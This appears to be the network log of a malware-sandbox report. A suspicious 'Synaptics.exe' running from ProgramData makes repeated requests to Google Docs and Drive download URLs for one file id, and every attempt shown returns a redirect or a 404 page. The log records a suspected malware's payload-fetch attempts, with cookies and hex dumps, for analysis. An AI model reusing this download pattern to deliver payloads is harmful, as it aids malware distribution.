                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-FCfhFJnKIDXXVBDYCyNViw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              38192.168.2.449805142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:13 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5BIpIiYpi5QrX3jGUgR4jCOoAxEfj-UQZ9xANAHuqSY9-gseZs6G-Pdnv2gM4xLaRdPYJqPLw
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:13 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-6khM-vAXxF7JMFmMsc3LcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:13 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:13 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 6a 4b 2d 52 78 6e 69 46 2d 74 63 41 51 5f 42 6d 65 2d 48 45 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="rjK-RxniF-tcAQ_Bme-HEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:13 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              39192.168.2.449809142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:13 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:13 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-mujnmGMg7TOR9Ky1mmYafQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              40192.168.2.449810142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:13 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:14 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC4AMNqEWdpcKFzdvG6_ExacVC5RlClV7_m8P8ZlO3xFloZRAnAGBAKG-hImOce5U0fm
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:13 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-M_mk_tAyYC1z88nVwQYKgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:14 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:14 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 71 38 4f 68 38 70 30 6b 2d 6d 73 33 54 37 45 56 36 30 76 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="1q8Oh8p0k-ms3T7EV60vAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:14 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              41192.168.2.449808142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:13 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:13 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-vR7IuDHtt0jURJ0CmqtgXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              42192.168.2.449811142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:13 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              43192.168.2.449813142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:14 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:14 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-q8FdwgXAZP9vy8Os8dSWVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              44192.168.2.449814142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:14 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                                                                                                                              2024-12-30 10:48:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-NjWMMhESiolXi1DuW40Xrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              45192.168.2.449815142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:14 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:15 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6GMloOK8BdCokIcBrRHngZX_URa-SH1_eI2mhpjKiRngE0fR3YF-0RmVI_Ha2KjvdNmKqxYKA
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-5UgY8RR8jVX-8Uq4IV1O8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:15 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:15 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 2d 37 33 53 73 70 32 30 67 56 37 72 4b 71 49 69 30 58 38 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
